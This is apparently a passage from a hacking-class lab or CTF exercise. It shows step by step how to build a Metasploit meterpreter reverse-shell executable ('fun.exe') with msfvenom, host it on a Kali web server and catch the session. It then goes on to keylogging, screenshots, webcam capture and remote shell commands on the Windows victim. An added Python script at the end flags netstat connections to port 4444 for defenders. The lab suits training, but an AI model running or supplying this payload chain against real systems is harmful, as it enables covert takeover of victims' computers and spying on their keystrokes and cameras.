A user who runs that file surrenders control of their computer.
ifconfig
Find your IP address and make a note of it.
In the example below, it is 172.16.1.203.
msfvenom -h
A help message appears, as shown below.
In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.
Adjust the IP address to match the IP address of your Kali machine (the C&C server).
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.203 -f exe > /var/www/html/fun.exe
service apache2 start
The operation proceeds without errors, as shown below.
msfconsole
Metasploit launches, as shown below.
In Kali, at the msf> prompt, execute this command.
help
Several pages of help scroll by.
The section we'll use is "Module commands", as shown below.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit starts a "reverse TCP handler", as shown below.
http://172.16.1.203/fun.exe
The file "fun.exe" downloads. Bypass any warning boxes, double-click the file, and allow it to run.
Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.
On your Kali machine, a meterpreter session opens, as shown below.
help
Several pages of help scroll by.
Several interesting commands are shown below.
To make the session more persistent, we'll migrate into a process that is likely to keep running longer.
To see a list of processes, at the meterpreter > prompt, execute this command:
ps
Let's migrate to the winlogon process.
At the meterpreter > prompt, execute this command:
migrate -N explorer.exe
Migration is unreliable. It may succeed, but it may time out. If it times out, take these steps, as shown below:
exit
exploit
migrate -N explorer.exe
If you can't get it to work after a few tries, skip it and proceed to the next section.
screenshot
Gives you an image of the target's desktop
keyscan_start
Begins capturing keys typed in the target. On the Windows target, open Notepad and type in some text, such as your name.
keyscan_dump
Shows the keystrokes captured so far
webcam_list
Shows the available webcams (if any)
webcam_snap
Takes a photo with the webcam
shell
Gives you a Windows Command Prompt on the target
exit
Leaves the Windows Command Prompt
netstat
A list of network connections appears, including one to a remote port of 4444, as highlighted in the image below.
Notice the "PID/Program name" value for this connection, which is redacted in the image below.
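From the defender's side, the same connection list is the first place an analyst would look for a reverse shell: an ESTABLISHED TCP connection to an unusual remote port, tied to a PID and program name. The script below, added here as an example and not part of the original project, parses a connection table laid out like the one the netstat command prints (Proto, Local address, Remote address, State, User, Inode, PID/Program name) and reports every established connection whose remote port is on a watch list. The sample output is constructed for the example; the addresses, PIDs and program names are made up, and 4444 is used only because it is the handler port this page's connection goes to.

```python
"""Flag established TCP connections to a watched remote port in netstat-style output.

Added example for this page, not code from the original project. The sample
table below is constructed to mirror the column layout of the netstat
connection list; every address, PID and program name in it is made up.
"""
import re
from dataclasses import dataclass

# Remote ports to flag. 4444 is the port the handler on this page listens on.
WATCH_PORTS = {4444}

# Constructed sample output (not captured from a real host).
SAMPLE_NETSTAT = """\
Connection list
===============

    Proto  Local address        Remote address      State        User  Inode  PID/Program name
    -----  -------------        --------------      -----        ----  -----  ----------------
    tcp    0.0.0.0:135          0.0.0.0:*           LISTEN       0     0      704/svchost.exe
    tcp    172.16.1.10:49167    172.16.1.203:4444   ESTABLISHED  0     0      2316/fun.exe
    tcp    172.16.1.10:49172    172.16.1.5:445      ESTABLISHED  0     0      4/System
    tcp6   :::135               :::*                LISTEN       0     0      704/svchost.exe
    udp    0.0.0.0:123          0.0.0.0:*                        0     0      1044/svchost.exe
"""


@dataclass(frozen=True)
class Connection:
    proto: str
    local: str
    remote: str
    state: str      # empty for UDP rows, which carry no state column
    pid: int        # 0 when the PID column could not be parsed
    program: str


def split_endpoint(endpoint):
    """Return (host, port) for 'host:port'; port is None for a wildcard '*'."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Turn the connection table into Connection records, skipping headers."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        # Data rows start with a protocol name; headings and rulers do not.
        if len(fields) < 4 or not fields[0].lower().startswith(("tcp", "udp")):
            continue
        proto, local, remote = fields[0].lower(), fields[1], fields[2]
        # The State column is upper-case text; UDP rows put a number there instead.
        state = fields[3] if fields[3].isupper() else ""
        m = re.fullmatch(r"(\d+)/(.+)", fields[-1])
        pid, program = (int(m.group(1)), m.group(2)) if m else (0, fields[-1])
        rows.append(Connection(proto, local, remote, state, pid, program))
    return rows


def find_suspicious(rows, watch_ports=WATCH_PORTS):
    """Established TCP connections whose remote port is on the watch list."""
    hits = []
    for c in rows:
        _, rport = split_endpoint(c.remote)
        if c.proto.startswith("tcp") and c.state == "ESTABLISHED" and rport in watch_ports:
            hits.append(c)
    return hits


def report(rows, watch_ports=WATCH_PORTS):
    """One line per hit, naming the process so the analyst can pivot on the PID."""
    return [
        f"PID {c.pid} ({c.program}) {c.local} -> {c.remote} {c.state}"
        for c in find_suspicious(rows, watch_ports)
    ]


if __name__ == "__main__":
    for line in report(parse_netstat(SAMPLE_NETSTAT)):
        print(line)
```

A port-based rule like this is only a starting point: the handler port is whatever the operator set (4444 is merely Metasploit's default), so the durable signal is the PID/Program name column, which lets the analyst pivot from the connection to the executable, its path and its parent process.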
Updated 5-23-18 to run as a CTF